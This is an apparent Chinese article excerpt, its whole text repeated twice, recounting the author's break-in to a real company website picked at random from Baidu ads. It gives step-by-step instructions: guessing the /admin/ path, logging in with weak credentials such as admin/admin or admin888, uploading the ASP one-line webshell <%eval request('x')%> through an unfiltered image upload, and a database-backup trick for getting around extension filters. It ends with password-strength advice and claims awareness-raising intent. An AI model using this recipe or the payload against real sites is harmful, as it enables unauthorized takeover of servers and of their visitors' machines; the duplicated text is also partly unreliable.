论文部分内容阅读
如果一个网站存在弱口令漏洞,能让人轻易的拿到网站的webshell,就会对网站的安全以及浏览这个网站的电脑的安全造成严重的威胁,这决不是危言耸听,你不信的话来看下面的一个例子。
昨晚在用百度搜索东西的时候看到了网页右边的推广网站,看来是网站购买了百度的推广服务,没什么事,就顺手点开一个网站看看网站的安全性如何。网站的地址为http://www.xxxfood.com/,为了不泄露具体的网址,我用xxx代替了网站域名的前3个字符,网站打开后如图1,界面还算清爽,来看下网站的安全性如何。
顺手在网址后面加上admin/,也就是尝试访问http://www.xxxfood.com/admin/,出来如图2的后台登录页面。可能有的朋友会问你在网址后面加的是admin为什么不是123456?因为admin是很多网站管理系统后台目录的名字,尤其是ASP程序的。有了后台登录页面再知道管理员的用户名和密码就可以登录后台了,但我现在不知道管理员的用户名和密码,怎么办呢?来尝试下弱口令。
弱口令(weak password) 没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令。网站管理员最常用的用户名为admin,常用的弱口令密码为admin,admin888,123456等。来尝试下弱口令,首先尝试用户名admin,密码admin,第一次尝试居然就进去了后台,看来今天的运气不错。因为很多小的企业网站存在弱口令漏洞,我们可以用admin,admin的用户名密码组合尝试,不成功还可以再尝试下admin,admin888和admin,123456等用户名和密码组合。 进入后台后的界面如图3。
进了后台就考虑利用后台的功能得到webshell。 最希望见到的就是可以直接上传webshell,如果过滤了上传文件的后缀的话可以先上传.jpg格式的webshell然后通过数据库备份功能把.jpg格式的webshell备份成.asp格式的(仅限于采用Access数据库的程序,而且后台要有数据库备份功能)。点击后台“新闻管理”下的“新闻添加”,再点“插入图片”按钮,出来了上传文件的地方,如图4。
把ASP一句话木马服务端代码<%eval request("x")%>保存为文件123.asp,通过“浏览”按钮选择123.asp,点“上传”按钮后提示“您的文件123.asp已成功上传!”,如图5。
好像上传成功了,说明程序没有对上传文件的后缀进行过滤。123.asp传到了哪里呢,点“HTML”按钮后就找到了上传文件的地址http://www.xxxfood.com/uploadpic/123.asp,如图6,说明上传到了网站根目录下的uploadpic文件夹下。
用lake2的eval最小马发送端连接http://www.xxxfood.com/uploadpic/123.asp,写上密码x,成功获得webshell,如图7。利用这个webshell可以完全控制网站下的任何文件,在网页里挂马更是轻而易举,如果利用这个webshell进行提权,甚至能拿到网站所在服务器的系统权限。而一旦拿到了网站所在服务器的系统权限,同服务器上的其它网站将没有任何安全可言。好在我只是想看下网站的安全性,拿到webshell后没有修改网站的首页,更没有在网站文件里挂马,没有对网站原有的文件进行任何更改。但我不敢保证下一个利用弱口令漏洞进来的人不会做坏事,因此弱口令的危害是巨大的。
弱口令漏洞是个很低级的漏洞,你用弱口令拿下一个网站都不好意思和别人说,但它的危害却是巨大的。一个网站的程序再安全,如果存在弱口令漏洞,在攻击者面前也可能瞬间被攻破。为什么会存在弱口令?很多时候是为了方便,好记。其实防范弱口令漏洞很简单,使用复杂一点的密码就可以了,比如密码的长度不要小于8位,密码最好由字母数字和特殊符号组成等。写本文的目的不是教大家怎样利用弱口令漏洞入侵网站,而是通过一个实例展示弱口令漏洞的危害,提醒有网站的朋友要注意弱口令漏洞,再远一点,你的邮箱、QQ等也要防范弱口令漏洞。
注:本文中所涉及到的图表、注解、公式等内容请以PDF格式阅读原文
昨晚在用百度搜索东西的时候看到了网页右边的推广网站,看来是网站购买了百度的推广服务,没什么事,就顺手点开一个网站看看网站的安全性如何。网站的地址为http://www.xxxfood.com/,为了不泄露具体的网址,我用xxx代替了网站域名的前3个字符,网站打开后如图1,界面还算清爽,来看下网站的安全性如何。
顺手在网址后面加上admin/,也就是尝试访问http://www.xxxfood.com/admin/,出来如图2的后台登录页面。可能有的朋友会问你在网址后面加的是admin为什么不是123456?因为admin是很多网站管理系统后台目录的名字,尤其是ASP程序的。有了后台登录页面再知道管理员的用户名和密码就可以登录后台了,但我现在不知道管理员的用户名和密码,怎么办呢?来尝试下弱口令。
弱口令(weak password) 没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令。网站管理员最常用的用户名为admin,常用的弱口令密码为admin,admin888,123456等。来尝试下弱口令,首先尝试用户名admin,密码admin,第一次尝试居然就进去了后台,看来今天的运气不错。因为很多小的企业网站存在弱口令漏洞,我们可以用admin,admin的用户名密码组合尝试,不成功还可以再尝试下admin,admin888和admin,123456等用户名和密码组合。 进入后台后的界面如图3。
进了后台就考虑利用后台的功能得到webshell。 最希望见到的就是可以直接上传webshell,如果过滤了上传文件的后缀的话可以先上传.jpg格式的webshell然后通过数据库备份功能把.jpg格式的webshell备份成.asp格式的(仅限于采用Access数据库的程序,而且后台要有数据库备份功能)。点击后台“新闻管理”下的“新闻添加”,再点“插入图片”按钮,出来了上传文件的地方,如图4。
把ASP一句话木马服务端代码<%eval request("x")%>保存为文件123.asp,通过“浏览”按钮选择123.asp,点“上传”按钮后提示“您的文件123.asp已成功上传!”,如图5。
好像上传成功了,说明程序没有对上传文件的后缀进行过滤。123.asp传到了哪里呢,点“HTML”按钮后就找到了上传文件的地址http://www.xxxfood.com/uploadpic/123.asp,如图6,说明上传到了网站根目录下的uploadpic文件夹下。
用lake2的eval最小马发送端连接http://www.xxxfood.com/uploadpic/123.asp,写上密码x,成功获得webshell,如图7。利用这个webshell可以完全控制网站下的任何文件,在网页里挂马更是轻而易举,如果利用这个webshell进行提权,甚至能拿到网站所在服务器的系统权限。而一旦拿到了网站所在服务器的系统权限,同服务器上的其它网站将没有任何安全可言。好在我只是想看下网站的安全性,拿到webshell后没有修改网站的首页,更没有在网站文件里挂马,没有对网站原有的文件进行任何更改。但我不敢保证下一个利用弱口令漏洞进来的人不会做坏事,因此弱口令的危害是巨大的。
弱口令漏洞是个很低级的漏洞,你用弱口令拿下一个网站都不好意思和别人说,但它的危害却是巨大的。一个网站的程序再安全,如果存在弱口令漏洞,在攻击者面前也可能瞬间被攻破。为什么会存在弱口令?很多时候是为了方便,好记。其实防范弱口令漏洞很简单,使用复杂一点的密码就可以了,比如密码的长度不要小于8位,密码最好由字母数字和特殊符号组成等。写本文的目的不是教大家怎样利用弱口令漏洞入侵网站,而是通过一个实例展示弱口令漏洞的危害,提醒有网站的朋友要注意弱口令漏洞,再远一点,你的邮箱、QQ等也要防范弱口令漏洞。
注:本文中所涉及到的图表、注解、公式等内容请以PDF格式阅读原文